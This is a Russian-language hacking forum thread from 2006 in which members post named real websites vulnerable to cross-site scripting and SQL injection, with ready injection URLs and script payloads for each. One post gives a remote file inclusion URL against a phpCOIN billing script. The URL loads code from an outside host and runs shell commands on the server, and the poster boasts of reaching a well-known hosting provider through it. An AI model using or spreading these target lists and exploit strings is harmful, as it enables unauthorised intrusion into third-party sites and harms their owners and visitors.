Баги на сайтах.

Discussion in 'Уязвимости' started by D1mOn, 28 Jan 2006.

Thread Status:
Not open for further replies.
  1. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    Очень часто создаются темы типа: Нашел XSS, Нашёл SQL injection. Уже немного надоело. Предлагаю всем найденные вами баги (если вам не терпится показать этот баг всем) постить в эту тему, чтобы не засорять форум!

    UPD: никаких рефереров! все линки даем исключительно так _http://
     
    #1 D1mOn, 28 Jan 2006
    Last edited by a moderator: 16 May 2006
    4 people like this.
  2. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    http://www.generis.ru/?page=press_wholenews&id='
    http://www.integracija.gov.lv/forum/?setc=1&forumid='
    http://www.mossei.ru/?page='
    Вот для начала
     
    1 person likes this.
  3. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Идея хорошая принципы .

    _www.pansionmsu.ru , в строке поиска <script>alert()<script>
    _http://msu.ru/ , в строке поиска , <script>alert()<script> не вышел , а <marquee>msu</marquee> выходит .

    _http://online.ua/ Строка поиска , <marquee>UA</marquee> , <img src="http://www.online.ua/all/0.gif"> покажет свой собственный логотип который в верхнем левом углу .
     
  4. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    _http://referat.star-info.ru

    В поиске если написать <i>i</i> то будет так

    Warning: eregi_replace(): REG_EMPTY in /usr/home/www/user/referat.star-info.ru/inc/func on line 73
     
  5. Shurik

    Shurik New Member

    Joined:
    13 Feb 2006
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    www.supersait.net.ru/billing/config.php?_CCFG[_PKG_PATH_DBSE]=http://qwe20063.narod.ru/&cmd=id
    сам сайт supersait.net.ru нечего из себя не представляет, зато он хостится на очень известном хостинге, до которого можно добраться используя багу в phpcoin.
    Тоесть благодаря php include мы можем выполнять никсовые комманды (ls;pwd;echo;cat) на сервере.
     
  6. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    _http://vidahl.agava.ru/cgi-bin/dic.cgi?search=%3Ci%3Ei%3C%2Fi%3E&method=exact




    В графе поиск статьи <script>alert()</script>
     
    1 person likes this.
  7. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Справочник телефонов города Орла

    http://www.g-play.ru/orel/

    "Поиск организаций по названию, виду деятельности:"

    В поиске <script>alert()</script>
     
  8. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Еще .

    1)


    url : _http://prohosting.fatpickle.com/search

    <script>alert()</script> в поиске .


    2)



    Url: _http://www.babr.ru/index.php?pt=pages


    <script>alert()</script> в поиске .

    3)

    url : _http://www.ambercity.ru/


    <script>alert()</script> в поиске .
     
    1 person likes this.
  9. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    1)


    Url :_http://www.cityvision2000.com

    Можно узнать путь установки .

    В поиске <script>alert()</script>

    "D:\Webs\city\www\search.cgi": No such file or directory

    2)

    url: _http://www.pages.ru/

    Поиск <script>alert()</script>
     
    1 person likes this.
  10. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    _http://zna.nu/vg_eng.php?id='
    Интересный сайт :)
     
  11. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Url : _http://xss.mask.ru/

    В поиске <script>alert()</script>
     
    1 person likes this.
  12. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    Url : _http://www.miit.net

    <script>alert()</script> В поиске
     
  13. Gang100

    Gang100 Banned

    Joined:
    18 Feb 2006
    Messages:
    32
    Likes Received:
    24
    Reputations:
    21
    XSS-уязвимости

    1. _http://www.ruslink.de/cgi-bin/search.pl XSS1 - "<script>alert()</script>" в строчке поиска.

    2. _http://links.keraben.ru/search.php XSS2 - "<script>alert()</script>" в строчке поиска.

    3. _http://www.send.ru/search/index.html XSS3 - "<script>alert()</script>" в строчке поиска.

    4. _http://coda.net.ru/index.php XSS4 - "<script>alert()</script>" в строчке поиска.

    5. _http://www.zlinks.ru/search.php XSS5 - "<script>alert()</script>" в строчке поиска.
     
    #13 Gang100, 7 Mar 2006
    Last edited: 7 Mar 2006
    2 people like this.
  14. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    И толку от них? Это пасивные XSS.
     
  15. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    http://icq.rambler.ru/popup.html?ipath=<script>alert()</script>

    =) Люблю Аську.
     
  16. Nexwill

    Nexwill Elder - Старейшина

    Joined:
    2 Aug 2005
    Messages:
    132
    Likes Received:
    45
    Reputations:
    22
    _http://www.nne.ru/news.php?id=1429'<script>alert(/nexwill/)</script> Гы ))))) :D :D
     
    1 person likes this.
  17. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    На __http://www.nne.ru Xss еще в поиске .
     
  18. Vandal

    Vandal Elder - Старейшина

    Joined:
    10 Mar 2005
    Messages:
    207
    Likes Received:
    18
    Reputations:
    3
    _http://www.flirtshop.ru/search.xhtml?sea_text=%3Cscript%3Ealert%28%22Vandal%22%29%3C%2Fscript%3E&-action.search=1
     
  19. seeattact

    seeattact Banned

    Joined:
    12 Jan 2006
    Messages:
    538
    Likes Received:
    87
    Reputations:
    2
  20. Gang100

    Gang100 Banned

    Joined:
    18 Feb 2006
    Messages:
    32
    Likes Received:
    24
    Reputations:
    21
    xss..

    1. _http://www.infopiter.ru/cgi-bin/catalog/catalog.cgi?action=search&fil=1&Keywords=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&poisk=word
    2. _http://list.emy.ru/search.php?keyword=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&opt=0&x=26&y=9
    3. _http://www.fromatoz.ru/catalog/search/?searchQuery=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    4. _http://links.vestor-ru.ru/0.html?s=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
    5. _http://catalog.a-les.ru/index.php?ac=search / в поиске <script>alert()</script>
     
Thread Status:
Not open for further replies.